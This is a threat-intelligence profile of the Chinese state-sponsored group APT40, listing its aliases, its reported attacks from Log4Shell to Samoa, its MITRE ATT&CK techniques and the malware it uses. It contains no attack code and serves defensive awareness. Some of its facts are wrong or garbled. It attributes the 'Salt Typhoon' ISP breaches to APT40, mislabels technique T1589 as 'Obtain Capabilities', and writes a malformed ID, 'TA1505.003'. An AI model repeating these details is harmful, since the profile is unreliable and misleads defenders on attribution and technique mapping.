Overview
APT40 (also known by numerous aliases) is a Chinese state-sponsored Advanced Persistent Threat (APT) group operating out of Haikou, Hainan Province, China. Active since at least 2009, APT40 is linked to the Ministry of State Security (MSS) Hainan State Security Department (HSSD). Their operations focus on espionage and intellectual property theft, targeting a broad range of industries and organizations globally, including those in the United States, Canada, Europe, the Middle East, and the South China Sea region. They utilize a combination of custom and open-source malware, sophisticated social engineering, and various advanced techniques to achieve their objectives. The provided document focuses on the tactics and techniques used rather than specific ransomware attacks, indicating that their primary goal is not financial gain through ransomware deployment, but rather the exfiltration of sensitive data for state-sponsored purposes.
Known Aliases of APT40
APT40 is also known as BRONZE MOHAWK, FEVERDREAM, G0065, Gadolinium, GreenCrash, Hellsing, Kryptonite Panda, Leviathan, MUDCARP, Periscope, Temp.Periscope, and Temp.Jumper.
Country of Origin
People’s Republic of China (PRC). Specifically, the group is located in Haikou, Hainan Province.
Notable Victims/Most Recent Attacks Involving APT40
Cyberattacks on Samoa (Early 2025)
APT40 was formally blamed by the Samoan government for a wave of cyberattacks on national government systems and infrastructure. This was the first time a Pacific Island nation publicly attributed an attack to the Chinese state-backed actor, signaling the group’s expanding influence in the Pacific region.
Breach of U.S. Internet Providers – “Salt Typhoon” (September 2024)
APT40 infiltrated multiple U.S. internet service providers by compromising Cisco routers and other network devices. The breach raised serious concerns over Chinese access to sensitive network infrastructure and was part of a broader campaign referred to as “Salt Typhoon.”
Exploitation of SOHO Routers (2024)
APT40 leveraged unpatched Small Office/Home Office (SOHO) routers to hide command-and-control operations, making attribution and defense more difficult. These compromised devices served as a launching point for advanced persistent attacks.
Cyberattack on New Zealand Parliament (2021, Publicly Attributed in 2024)
New Zealand attributed a 2021 breach of its Parliamentary Service and Parliamentary Counsel Office to APT40. While the exfiltrated data was not classified, the incident prompted heightened scrutiny of Chinese cyber activity in the region.
Targeting of Australian Networks (2023–2024)
APT40 targeted a range of Australian government and private sector entities by exploiting vulnerable and outdated internet-facing devices. Australia publicly condemned the activities with support from the U.S., UK, and Japan.
Attacks on Defense Systems in Southeast Asia (June 2023)
The group was linked to targeted intrusions into Southeast Asian military and defense systems using spear-phishing campaigns and malware implants designed to extract classified defense intelligence.
Exploitation of Log4Shell Vulnerability (2021–2022)
APT40 was quick to exploit the critical Log4Shell vulnerability after it became public, targeting enterprise systems to conduct espionage and establish persistent access to sensitive environments.
Common Methods of Infiltration Used by APT40
APT40 utilizes a variety of infiltration methods:
- Spearphishing: Targeted emails containing malicious attachments or links.
- Drive-by Compromises: Exploiting vulnerabilities in publicly accessible applications.
- Exploiting Valid Accounts: Using compromised administrative accounts.
- Social Engineering: Using various social engineering techniques to manipulate individuals into revealing sensitive information or performing actions that compromise security.
APT40 MITRE ATT&CK Tactics and Techniques
APT40 exhibits a broad and sophisticated use of MITRE ATT&CK tactics across the full intrusion lifecycle, combining custom malware with open-source tools and living-off-the-land techniques to evade detection and maintain persistence.
1. Reconnaissance & Resource Development
APT40 performs extensive pre-attack research and infrastructure setup to support targeted intrusions:
- T1589 – Obtain Capabilities (Sensitive Information)
- T1589.001 – From Compromised Credentials: Leverages previously stolen credentials to support initial access.
- T1583 – Acquire Infrastructure
- T1583.001 – Domains: Registers attacker-controlled domains, often via typosquatting, for C2 and phishing.
- T1585.002 – Establish Accounts (Email Accounts)
- T1586.002 – Compromise Accounts (Social Media/Email)
2. Initial Access
APT40 uses a variety of techniques to gain initial entry into targeted environments:
- T1133 – External Remote Services
- Exploits remote services such as VPNs or RDP for unauthorized access.
- T1566 – Phishing
- T1566.001 – Spearphishing Attachment
- T1566.002 – Spearphishing Link
- T1189 – Drive-by Compromise
- T1190 – Exploit Public-Facing Application
- Targets unpatched internet-facing systems.
- T1078 – Valid Accounts
- T1078.001 – Compromised Credentials: Frequently uses stolen credentials from third-party breaches or prior campaigns.
3. Execution
Once inside, APT40 runs malicious code using both custom scripts and native OS functionality:
- T1059 – Command and Scripting Interpreter
- T1059.001 – PowerShell: Used for payload execution, privilege escalation, and reconnaissance.
- T1203 – Exploitation for Client Execution
- Uses known vulnerabilities to execute code post-access.
- T1204 – User Execution
- T1204.002 – Malicious File: Relies on social engineering to trick users into executing payloads.
4. Persistence, Privilege Escalation, Credential Access, Discovery, Lateral Movement
APT40 employs a combination of native tools, malware, and stolen credentials to maintain access and move laterally:
- Persistence & Privilege Escalation
- Uses valid accounts and malware implants with persistence mechanisms.
- Credential Access
- Extracts cached credentials and uses mimikatz-like tools.
- Discovery & Lateral Movement
- Executes internal reconnaissance and pivots using compromised credentials.
- T1534 – Internal Spearphishing
- Sends phishing emails from compromised internal accounts to spread laterally.
5. Defense Evasion
APT40 applies advanced evasion techniques to remain stealthy in target environments:
- T1027.003 – Obfuscated Files or Information (Steganography)
- T1001.003 – Data Obfuscation (Protocol Impersonation)
- T1572 – Protocol Tunneling
- T1090.003 – Proxy
- Routes C2 traffic through multiple proxy layers.
- T1583.001 – Acquire Infrastructure (Domains for Obfuscation)
- S0183 – Use of Tor Network
- C2 traffic occasionally routed through anonymizing services.
6. Command and Control (C2)
APT40 maintains robust and stealthy communications with infected hosts:
- Custom C2 Infrastructure
- Often established through typosquatted domains that impersonate legitimate services or brands.
- Encrypted Channels & Proxy Layers
- Uses protocol impersonation and tunneling to bypass network defenses.
7. Collection
Data collection and staging is handled systematically to support exfiltration:
- T1560 – Archive Collected Data
- T1532 – Data Encrypted
- Ensures confidentiality of stolen data during transit.
- T1074.001 – Local Data Staging
- T1074.002 – Remote Data Staging
8. Exfiltration
APT40 employs multiple methods to extract data covertly:
- T1041 – Exfiltration Over Command and Control Channel
- Data is exfiltrated over encrypted or disguised channels to avoid detection.
Malware Strains Used by APT40
There is a large library of custom and open-source malware, much of which is shared with other suspected Chinese groups. Specific malware names listed include:
- BADFLICK/Greencrash
- China Chopper
- Cobalt Strike
- Derusbi/PHOTO
- Gh0stRAT
- GreenRAT
- jjdoor/Transporter
- jumpkick
- Murkytop (mt.exe)
- NanHaiShu
- Orz/AirBreak
- PowerShell Empire
- PowerSploit
There is also an extensive use of web shells (TA1505.003).
